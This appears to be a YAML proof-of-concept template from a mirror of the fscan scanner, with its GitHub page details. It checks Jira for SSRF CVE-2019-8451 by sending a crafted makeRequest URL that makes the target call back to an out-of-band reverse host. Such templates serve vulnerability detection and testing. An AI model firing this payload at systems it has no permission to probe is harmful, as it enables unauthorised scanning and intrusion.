mirror of https://github.com/qwqdanchun/fscan.git
20 lines
553 B
YAML
20 lines
553 B
YAML
name: poc-yaml-jira-ssrf-cve-2019-8451
|
|
set:
|
|
originScheme: request.url.scheme
|
|
originHost: request.url.host
|
|
reverse: newReverse()
|
|
reverseHost: reverse.url.host
|
|
reverseURL: reverse.url.path
|
|
rules:
|
|
- method: GET
|
|
path: >-
|
|
/plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
|
|
headers:
|
|
X-Atlassian-Token: no-check
|
|
expression: |
|
|
reverse.wait(5)
|
|
detail:
|
|
author: jingling(https://github.com/shmilylty)
|
|
links:
|
|
- https://jira.atlassian.com/browse/JRASERVER-69793
|